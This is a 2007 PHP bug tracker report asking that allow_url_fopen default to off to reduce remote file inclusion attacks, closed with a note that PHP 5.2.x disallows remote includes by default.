ID: 41156 Updated by: [EMAIL PROTECTED] Reported By: c dot heutger at psw dot net -Status: Open +Status: Closed Bug Type: PHP options/info functions Operating System: irrelevant PHP Version: 4.4.6 New Comment:
This issue was addressed in the latest 5.2.x releases by disallowing using remote files in include statements by default. Previous Comments: ------------------------------------------------------------------------ [2007-04-21 09:37:34] c dot heutger at psw dot net Description: ------------ Meanwhile you installed a big warning in PHP installation on register_globals and default them to off, there is no warning at all and it is per default on on url_fopen, although with using of includes, this variable opens any hackers from outside a door inside your applications (e.g. used by opensurveypilot). So we had in the last time many hackins as this variable is on either by default installation or by templates like distributed via SWsofts Virtuozzo or with Plesk. This value should be warned the same and set to off by default like the register_globals. Reproduce code: --------------- Try to refer any http:// ressource in e.g. opensurveypilot files using include and url_fopen is on Expected result: ---------------- Hacked sites if it's like default url_fopen off by default in future PHP versions Actual result: -------------- A big security whole for lame code and programmers still open. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=41156&edit=1